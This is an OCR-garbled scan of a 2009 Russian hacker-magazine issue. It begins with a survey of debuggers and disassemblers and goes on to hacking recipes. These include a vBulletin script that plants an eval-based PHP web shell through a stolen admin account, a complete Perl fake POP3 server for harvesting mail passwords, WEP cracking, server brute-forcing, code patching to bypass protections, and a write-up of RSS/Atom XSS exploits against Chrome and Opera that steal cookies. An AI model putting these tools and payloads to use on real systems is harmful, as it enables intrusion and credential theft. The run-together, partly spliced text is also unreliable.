книги хакеры / журнал хакер / 130_Optimized

ЛЕГЕНДАРНЫЙОТЛАДЧИКВСЕХ ВРЕМЕНИНАРОДОВ

отличие от прикладных отладчиков (например, OllyDbg) SoftICE способен приостановить все операции в Windows, что очень важно для отладки драйверов. Прога работает в обход MS Debugging API и таким образом значительно усложняет антиотладку, однако, учитывая, что для разработчиков защит SoftICE — враг номер один, практически все протекторы легко распознают его присутствие в системе. Поэтому никак не обойтись без специальных расширений.

SoftICE был первоначально разработан компанией NuMega, которая включала его в пакет программ для быстрой разработки высокопроизводительных драйверов под названием Driver Studio, и впоследствии приобретен компанией Compuware. Помнишь, сколько всевозможных мануалов было по поводу установки SoftICE’а под Windows XP? Увы, начиная с висты, отладчик в системе не заведется. Разработчики приостановили разработку в апреле 2006 года. На официальном сайте его не найти и он доступен только на торрентах.

отладчик Microsoft Debugger, а также SDK,

включающая в себя документацию, заголовочные файлы, библиотеки и несколько примеров того, как надо писать плагины. Непосредственно отладчик входит еще и в набор для разработки драйверов — Windows Driver Kit (бывший Driver Development Kit или DDK).

Microsoft Debugger может работать как на прикладном уровне (т.е. ring-3), так и на уровне ядра. Причем долгое время ядерная отладка требовала, как минимум, двух машин, соединенных COM-шнурком — теперь достаточно одной. Приятно еще и то, что отладчик поддерживает все самые современные ОС от Microsoft, а также x64-битные платформы. Microsoft Debugger поставляется в двух редакциях: windbg.exe — графический интерфейс и cdb.exe — интерфейс командной строки. И то и другое является обертками вокруг dbgeng.dll, в которой, собственно, и реализован основной отладочный движок и документированный протокол обмена.

Syser Kernel Debugger www.sysersoft.com

Достойных отладчиков ядра всего три: SoftICE, Syser и Microsoft Kernel Debugger, но SoftICE не работает на висте и Server’е 2008, а Microsoft Kernel Debugger — для хакерских целей не самый лучший вариант. Остается Syser, который хакеры взяли на вооружение и весьма активно используют. Написан он двумя предприимчивыми китайскими ревер-

серами Wu YanFeng и Chen JunHao.

По своей сути, Syser — это отладчик уровня ядра с графическим оконным интерфейсом, позволяющий отлаживать как приложения, так и драйвера. Эта изумительная прога сочетает в себе функции как IDA Pro, SoftICE, так и OllyDbg. Syser поддерживает подсветку листинга дизассеблера, динамическую загрузку и выгрузку, все команды отладчика SoftICE, полноценную работу с юникодом и многопроцессорными системами. Проработаны многие мелочи: например, корректно работает буфер обмена, позволяющий копировать данные из уровня Ring 3 в уровень Ring 0. Многие из операций можно автоматизировать с помощью скриптов. Надо сказать, что Syser — преемник SoftICE, из которого, как говорят, были дернуты целые модули. У него масса преимуществ, как, впрочем, масса недостатков, поэтому, реально его приходится юзать совместно с

Microsoft Kernel Debugger.

GDB sourceware.org/gdb

GNU Debugger — основной отладчик под UNIX, поддерживающий отладку многих языков программирования, в том числе Си и C++. В поставке по умолчанию графический

ОТЛАДЧИКЯДРАСГРАФИЧЕСКИМИНТЕРФЕЙСОМ

интерфейс не предусмотрен, но существует довольно много фронтендов, в том числе

— Xxgdb (en.wikipedia.org/wiki/Xxgdb), DDD (www.gnu.org/software/ddd), KDbg (www.kdbg. org), Xcode (developer.apple.com). Отлаживать с его помощью «честные» программы — одно удовольствие, но в плане антиотладки дела обстоят плохо. GDB даже не пытается сопротивляться и работает через библиотеку ptrace (которая на самом деле никакая не библиотека, а системный вызов). Другими словами, GDB принципиально неспособен отлаживать программы, которые не хотят, чтобы их отлаживали. Естественно, помимо GDB существу-

ОТЛАЖИВАЕМПРОГУПОДНИКСАМИ

ют и другие отладчики для никсов, например, Linice (www.linice.com) — неофициальный порт SoftICE’а под Linux.

IDA Pro www.hex-rays.com/idapro

IDA Pro — это одновременно интерактивный дизассемблер и отладчик. Он позволяет превратить бинарный код программы в ассемблерный текст, который может быть применен для анализа работы приложения. Правда, стоит сказать, что встроенный ring-3 отладчик довольно примитивен. Он рабо-

тает через MS Debugging API (в NT) и через библиотеку ptrace (в UNIX), что делает его легкой добычей для защитных механизмов. Но зато IDA Pro — это дизассемблер более чем с десятилетней историей, первая версия которого увидела свет 6 мая 1991 года. Юрий Харон вместе с Ильфаком начали работать в

РЕЗУЛЬТАТДЕКОМПИЛИРО- ВАНИЯВC-КОД СПОМОЩЬЮ

HEX-RAYS

warning

• Всяинформация представленавобразовательныхцелях. Помни, чтореверсинг приложенийи, тем более, ихвзломпопадаютподстатьиУК.

dvd

Теутилиты, которые можносвободно распространять, ты найдешьнанашем

DVD-диске.

040

IDA PRO ЗАРАБОТОЙ

том направлении, куда еще никто не вкладывал деньги. Через несколько лет парням удалось решить практически все фундаментальные проблемы дизассемблирования, над которыми просто не хотели работать остальные разработчики, зная, что быстрой отдачи не будет и проект потребует десятилетий упорного труда. К пятой версии, IDA Pro выполняла автоматическую декомпиляцию на самом высоком уровне, используя перекрестные ссылки, знание параметров вызовов функций стандартных библиотек и другую информацию. Но самая главная фишка — это интерактивное взаимодействие с пользователем. В начале исследования дизассемблер выполняет автоматический анализ программы, а затем пользователь с помощью интерактивных средств IDA начинает давать осмысленные имена, комментировать, создавать сложные структуры данных и другим образом добавлять информацию в листинг, генерируемый дизассемблером. Влюбленные в продукт пользователи разработали немало полезных плагинов, в том числе поддерживающих

ДИЗАССЕМБЛЕРНЫЙЛИСТИНГWINDBG

CLOUD

разные скриптовые языки для написания сценариев в дополнение к встроенному IDC. Например, IdaRUB (www. metasploit.com/users/spoonm/idarub) добавляет поддержку Ruby, а IDAPython (www.d-dome.net/idapython) — под-

держку Python’а. Тут надо сказать, что, начиная с версии 5.4, дополнение IDAPython идет предустановленным в сам дистрибутив IDA.

Hex-Rays www.hex-rays.com

После успеха IDA Pro разработчики подумали и решили, что уж раз они научились получать человеческий код на ассемблере, то неплохо дописать еще одну фичу, переводящую ассемблерную грамоту в доступный и понятный листинг на языке Си. В итоге на свет появился Hex-Rays

— декомпилятор, требующий обязательно установленную на компьютеру IDA Pro. Декомпилятору подается на вход бинарник, указывается ряд параметров, после чего HexRays выплевывает исходник на чистом C — в большин-

XÀÊÅÐ 10 /130/ 09

9

ДЕКОМПИЛИРУЕМПРИЛОЖЕНИЯ, НАПИСАННЫЕНАDEPLHI/ C BUILDER

стве своем понятный и доступный. Правда, спешить компилировать его обратно в бинарник не стоит, потому как в большинстве случаев в момент компиляции ты увидишь столько ошибок, сколько еще не видывал. Одна из причин — отсутствие поддержки в

Hex-Rays ресурсов.

W32DASM

Отличный дизассемблер, удобный и понятный. Набор функций, с точки зрения профессионала, довольно ограничен, да и вообще, его пора отнести к инструментам из прошлого века, но нет... W32DASM выдает хороший листинг, и для новичков является отличным вариантом, чтобы понять и разобраться, что к чему. К тому же, именно на этот дизассемблер авторы опираются в многочисленных мануалах для новичков, в том числе в нашем HOWTO для начинающих «Крякинг — это просто» (#80 z, статья в PDF на нашем диске).

DeDe

Начинающие хакеры обычно испытывают большие трудности при взломе программ, написанных на Delphi и Builder, поскольку классические трюки, типа бряка на GetWindowTextA, не работают. Для декомпиляции кода, написанного на Delphi/Borland C++ Builder, т.е программ, которые используют библиотеку VCL от Borland, нужен специальный подход, и он реализован в утилите

DeDe.

По сути, это единственный работающий декомпилятор для приложений на Delphi, которые несмотря ни на что не умирают.

Автор проекта DaFixer, к сожалению, бросил заниматься своим детищем, поэтому официальной страницы у проекта в настоящий момент нет. Подробнее о том, как совладать с программами на Delphi, читай в статье «Взлом Борландии: изящная декомпиляция Delphi» (PDF-версию материала ты найдешь на диске).

VB Decompiler www.vb-decompiler.org

Программы, разработанные на Visual Basic’е, могут быть скомпилированы либо в интерпретируемый p-code, либо в

¹ 1 ЗАДАЧА: АВТОМАТИЗИРОВАТЬ

ПРОЦЕССЗАГРУЗКИШЕЛЛА НАСЕРВЕРЧЕРЕЗ VBULLETIN

РЕШЕНИЕ:

ЧастеньконапросторахСетивстречаютсябажныефорумы, черезкоторыепорой оченьхочетсязалитьшелл, дабыобрестиполноценныйдоступксерверу:). ПопулярныйфорумныйдвигvBulletin aka булка— неисключение. Залитьшелл черезадминкусегопродуктадовольнопросто. Дляэтогоследует:

1.Поиметь админский аккаунт (только не спрашивай меня: «как?»)

2.Залогиниться в админке

3.Добавить новый модуль с телом нашего шелла (не более 60 Кб)

Однако, когдабажныхфорумовмного, авремени— мало, разумнеезаливать шеллывавтоматическомрежиме, благо, специальнодляэтихцелейбылнапи-

сан«vBulletin shell installer» оттоварищаDeusTirael. Все, чтооттебятребуется

— подправитьпарустроквконфигескрипта, аименно:

$login = "admin"; // логин админа форума $passw = "password"; // пароль админа форума

Удобныйшелл-инсталлердлябулки

$cookies = ""; // êóêè

$admincp = "http://blablabla.com/vbl/admincp/"; // полный http-линк до админки

$pltitle = "plugin"; // plugin title

$shellcode = 'eval(@$_REQUEST[c]);'; // код пхп-шелла

P.S. СкриптуспешноработаетсvBulletin 3.5.*.

¹ 2 ЗАДАЧА: СБРУТИТЬWEP-КЛЮЧ, ИС-

ПОЛЬЗУЯНОУТСВИНДОЙ

РЕШЕНИЕ:

Еслитызанимаешьсявардрайвингомнепервыйдень, тонаверняказнаком стакойпопулярнойутилой, какAircrack. Существуетудобнаяоболочка дляданнойтулзыподназваниемAiroWizard, котораяпредставляетсобой

мощныйинструментдляанализазащищенностиви-фисетей. Кстатиговоря, AiroWizard реализованакакразподвиндуиобладает, кактыужедогадался, гуишныминтерфейсом:). Анализироватьсетиспомощьюутилынесложно, алгоритмтвоихдействийниже:

1.Сливаем тулзу с нашего диска, инсталлим, запускаем

2.Включаем адаптер, смотрим лист адаптеров в утиле и выбираем свой; если список пуст, либо карточка отсутствует — смело жми «refresh»; если и это не помогает — значит твой адаптер не поддерживается софтиной :(

3.После выбора адаптера жмем баттон «Start Airserv-ng» на вкладке «Monitor Mode»

4.Теперь запускаем утилу Airodump-ng в режиме мониторинга на вкладке «Monitor Mode»

5.Наблюдаем за ходом сканирования и определяем нужную точку

6.Запускаем Airodump-ng с нужными нам параметрами: SSID, MAC и указываем имя дампа для записи собранных пакетов; все это на вкладке AP details and Airodump-ng

АнализируемWEP

7.Переходим в раздел Authentication and packer replay\ injection и последовательно выполняем все необходимые действия

8.Собираем не менее 40к пакетов и приступаем к бруту WEP-ключа на вкладке WEP crack\recovery

Вотивсе, – списокподдерживаемыхадаптеровтыможешьнайтивсамой утиле. Кромевсегопрочего, тулзапозволяетизменятьMAC-адресадаптера паройкликовмышки :).

¹ 5 ЗАДАЧА: ВЫТАЩИТЬ«ЗАБЫТЫЙ» ПА-

РОЛЬИЗПОЧТОВОГОКЛИЕНТА

РЕШЕНИЕ:

Довольнотривиальнаязадачка—имеетсяустановленныйпочтовик,в которомвбитпредустановленныйпароль.Чтобыегорасшифровать,есть, минимум,3способа.Во-первых,заветныйпарольможновытащитьизконфи- гов(каквручную,такиразличнымиприложениями).Однаковбольшинстве случаевпассвордшифруется,иизъятьегонеполучается.Например,теже Openpass,PassviewилиRecoverнезапускаютсяприустановленномантивирусеилифайрволе.Витогеприходитсядовольствоватьсястарымдедовским способомпоискусственному«выманиванию»паролейизпочтовыхпрограмм. 1.ОткроемтвойлюбимыйблокнотинапишемпростенькийFake-POP3- сервер, посредствомкотороговытащимлюбойпароль.

#!/usr/bin/perl

# Emulate the fake pop3 service ;) use IO::Socket;

$|++; # Юзаем сокет и отрубаем буферизацию

$sock=IO::Socket::INET->ne w(Listen=>10,LocalPort=>1 10,Proto=>'tcp',Reuse=>1) || "Cant open port: $!\n";

# Создаем сокет на 110 порту локальной машины

while($client=$sock- >accept()) {

while(1) { # Слушаем новых клиентов и входим в бесконечный цикл при каждом новом соединении $client->send("+OK Fake POP Service ready\n"); # Выдаем

баннер $stat=$client->recv($data,1024); $client->send("+OK Password?\n");

$stat=$client->recv($data,1024); # Организуем обмен данными согласно RFC1939

(undef,$data)=split('',$data);

print "Password is \"$data\"\n»; # Отделяем пароль и пишем его в консоль

close($client); # Обрубаем клиент и выходим из программы exit;

}

}

2.Изменяемвклиентехостпочтовогосервераналокальныйадрес(либо налюбойдругой, кудабудетзаливатьсяфейковыйскрипт).

3.Запускаемфейковыйскриптиинициируемпроцессполученияновых сообщений. Какитог— тыполучишьпарольвplain-text, нарисованныйв консоли. Задачкавыполнена.

Кстати, такможнополучитьпаролиотсовершеннолюбыхклиентов(например, наFTP). Главное— знатькомандыобменавнужномпротоколе.

¹ 6 ЗАДАЧА: СБРУТИТЬВИН-ДЕДИК

РЕШЕНИЕ:

5. Нажать баттон «start»

Полагаю, вопросовбольшенет— вперед, брутить:).

Брутимвин-дедики:)

¹ 7 ЗАДАЧА: РЕАЛИЗОВАТЬПРИПОМОЩИ

ОТЛАДЧИКАOLLYDBG ИЗМЕНЕНИЕ КОДАПРОГРАММЫЕЩЕДОНАЧАЛАЕГО

ВЫПОЛНЕНИЯСМОМЕНТАПОПАДАНИЯНАТОЧКУ ВХОДА

РЕШЕНИЕ:

1.Методрешениязадачидовольнопростиосновываетсянаиспользовании TLS-callback функций. ЦитатаизMSDN: «Методлокальногохранилищапотока позволяеткаждомупотокумногопоточногопроцессавыделятьадресадляхраненияданныхдляопределенногопотока». TLS поддерживаетвызовcallback-функ- ций, указателинаадресакоторыххранятсявспециальнойTLS-таблице, причем вызовэтотпроисходитещедовыполненияинструкций, располагающихсяна точкевхода. Такуюфункциюмыисоздадим, чтобыизменитькодпрограммы. Будем использоватьдляэкспериментовнаписанныйнаассемблерефайл, выдающий окноссообщением«Hello, World» (егоможнонайтинанашемDVD).

СоздаемTLS-директориювлюбойсуществующейсекции. Незалезаявдебри, открываемPE-файлприпомощиOllyDbg, выделяем16 нулевыхбайт, располагающихсянижекода(онивыравниваютразмерсекции), иприпомощикоманды «Binary ÆEdit» контекстногоменювносимследующуюпоследовательность: «00

1140 00 10 11 40 00 4D 10 40 00 36 10 40 00» (длядругогоприложенияадресамогут бытьиными). Первыйивторойадрес— 00401100 и00401110 — являютсяадресами началаиконцавыделяемойдляпотокаобластиданных. Поадресу0040104D будет записанозначение-индекс(еговозвратитфункция, выделившаяблокпамятидля потока). Наконец, 00401036 — этоадрестаблицыcallback-функций.

2.Приступимкформированиютаблицыcallback-функций. Переходимкадресу 00401036, выделяем6 байт, выбираемизконтекстногоменюкоманду«Binary Æ Edit». Вводимзначение«40 10 40 00 00 00». Первые4 байтауказываютнаадрес callback-функции. Последниедванулевыхбайтауказываютнаокончаниетаблицы callback-функций.

3.Можноразмещатькодфункциипоадресу00401040. Егофункциональность можетбытьлюбой; внашемслучаемыизмениминструкцию, передающуюодиниз параметровAPI-функцииMessageBoxA — «PUSH 0». Онарасполагаетсяпрямона точкевхода, поадресу00401000. Изменятьеена«PUSH 1» (значениеуказываетна то, чтоокошкоссообщением«Hello, World», выдаваемоепрограммой, будетиметь неодну, адвекнопки— «Ok» и«Отмена») будетследующийcallback-код:

00401040 MOV EAX,00401000; помещаем в EAX адрес точки входа

00401045 MOV EBX,0068016A; новый машинный код инструкции, первоначальный имел вид 0068006A

0040104A MOV DWORD PTR DS:[EAX],EBX; производим патчинг инструкции

0040104C RETN; возвращаемся из функции

Сохраняемфайл(командаCopy to executable ÆAll modifications контекстного менюправойкнопкимыши).

4.ТеперьнеобходимовнестиадресTLS-директориивPE-заголовокисследуемого файла. Вокнедампапереходимкадресу00400000, вокнедампавыбираемSpecial ÆPE Header, чтобыотладчикрассматривалданныекакPE-заголовок. Прокручиваемдампчутьниже, поканевстретимсигнатуруPE. Вспискеполейструктуры ищемполеTLS Table address иприпомощикомбинацииклавиш<Ctrl+E> открываемменюредактирования. Адрес, покоторомурасполагаласьразмещенная намитаблица, имелзначение00401026. Вспоминая, чтовPE-заголовокнужно вводитьсмещения, анеабсолютныеадреса, отнимаемотзначения00401026 значениеImageBase (00400000) иполучаемзначение00001026. Такимобразом, вводимвокноредактированияпоследовательность26 10 00 00. Изконтекстного менювыбираемCopy to executable File; впоявившемсяокнеснованажимаем

направуюкнопкумышиивыбираемизменюSave file. Сохраняемфайл. Запуск удаетсяуспешно, программаотображаеткнопкиOk иОтмена, хотяпервоначально отображаласьлишьоднакнопка.

ЗАДАЧА: ЭМУЛИРОВАТЬРЕЗУЛЬТАТ ¹ 8 ВЫПОЛНЕНИЯRDTSC (АССЕМБЛЕРНАЯ

ИНСТРУКЦИЯ-СЧЕТЧИКТАКТОВ) ДЛЯ ОБХОДАНЕКОТОРЫХПРОГРАММНЫХ

ЗАЩИТ

РЕШЕНИЕ:

1. УстанавливаемутилитуKernel-Mode Driver Manager, написанную хакеромFour-F.

2. Скачиваем с http://www.wasm.ru или забираем с нашего диска драйвер fakerdtsc.sys c исходными кодами (это поз-

Драйверзагружен— результатRDTSC подменяется

волит при желании его модифицировать и собрать нужный вариант). Драйвер «кормит» вызывающие RDTSC приложения малыми псевдослучайными числами, что делает работу защит, основанных на использовании RDTSC, бессмысленной.

3.Загружаемfakerdtsc.sys припомощиутилитыKernel-Mode Driver Manager и«проводим» еговнутрьсистемыприпомощинажатиякнопок

«Register» и«Run».

4.Выполняемнеобходимыеманипуляциивотладчике, необращаявниманиянаRDTSC.

5.Останавливаемработудрайвера(Stop, Unregister).z

Сработало— кодcallback-функциивыполняетсяещедопереброскина точкувхода

01МЕЖСАЙТОВЫЙСКРИПТИНГПРИОБРАБОТКЕRSS ИATOM ЛЕНТВOPERA

ИGOOGLE CHROME

BRIEF Вужедалеком2006 годунекиеJames Holderness иJames M. Snell провелиисследование, направленноенавыявлениеразличных XSS-уязвимостейвнекоторыхонлайнфид-аггрегаторах(например, Feed Demon).

Ивот, 15 сентябрясегогодаещеодинбагокопательInferno решил продолжитьисследованиеираскопаланалогичныеуязвимостив последнихверсияхпопулярныхбраузеровGoogle Chrome иOpera (full disclosure отInferno находитсяпоадресу: http://securethoughts. com/2009/09/exploiting-chrome-and-operas-inbuilt-atomrss-reader- with-script-execution-and-more).

EXPLOIT Самавторприводитнесколькосценариевэксплуатациибагов, ипервыйизнихтаков:

1.Спомощьюсоциальнойинженерииатакующийподсовываетжертве ссылкунаrss/atom ленту, находящуюсянасвоемevil-сайте(жертва должнаиспользоватьGoogle Chrome илиOpera вкачествеосновного браузера);

2.Злонамеренныйкодисполняетсявбраузережертвы.

Profit в случае этого сценария следующий: фишинг (можно спросить у юзера его данные для доступа к Google Reader, My.Opera. com и другим онлайн-сервисам), поиск в истории браузера на предмет посещенных страниц (подробнее о данном виде атак читай по ссылке http://jeremiahgrossman.blogspot.com/2006/08/i- know-where-youve-been.html), сканирование внутренней сетки юзера с помощью javascript (описание этой атаки — http:// jeremiahgrossman.blogspot.com/2006/11/browser-port-scanning- without.html). Собственно, эксплойтыипримерыэтогосценария находятсятут:

1.Google Chrome (18 примеровXSS) — http://securethoughts.com/ security/rssatomxss/googlechromexss.atom;

2.Opera (38 примеровXSS) — http://securethoughts.com/security/ rssatomxss/opera10xss.atom.

Далееследуетещеодинзамечательныйсценарий:

1.Уатакующегоиужертвыестьаккаунтынадоверенномвеб-сайте (илиэтотдоверенныйсайтпозволяетатакующемуинжектитьjavascript влюбуюизлентновостей, читай— утебяестьшеллилиftp-доступна данномресурсе);

2.Доверенныйвебсайтиспользуетсистемублэклистингадляизвестных исполняемыхипростоопасныхтиповфайлов(html,jsp,php,htaccessит.д.);

3.Атакующийзаливаетфайлсрасширением.rss или.atom (иливообще слюбымрасширением, исполняемымкак.rss/.atom, например.atom. tx, таккакбольшинствовеб-серверовподефолтуопределятфайл, как

«application/{atom/rss}+xml»);

4.Атакующийдаетжертвелинкназагруженныйфайл;

5.Кукиидругаячувствительнаяинформацияжертвыуплываюткатакующему:).

Эксплойтыдляэтоговариантасценариянаходятсятут:

1.Opera — http://securethoughts.com/security/rssatomxss/opera10xss. atom.tx;

2.Chrome — http://securethoughts.com/security/rssatomxss/ googlechromexss.atom.tx.

Вкачестве бонуса исследователь напоминает нам тот факт, что всеми любимый Internet Explorer (в частности, 8 версия) автоматически поддерживает файлы с неизвестным расширением и может исполнить их контент как обычный html+javascript (многое зависит от mime type файла).

Так что все вполне может подойти и для IE. Для примера зайди с по-

мощью Internet Explorer по адресуhttp://securethoughts.com/security/ rssatomxss/anyfile.tx и насладись простейшим javascript-алертом из данного файла: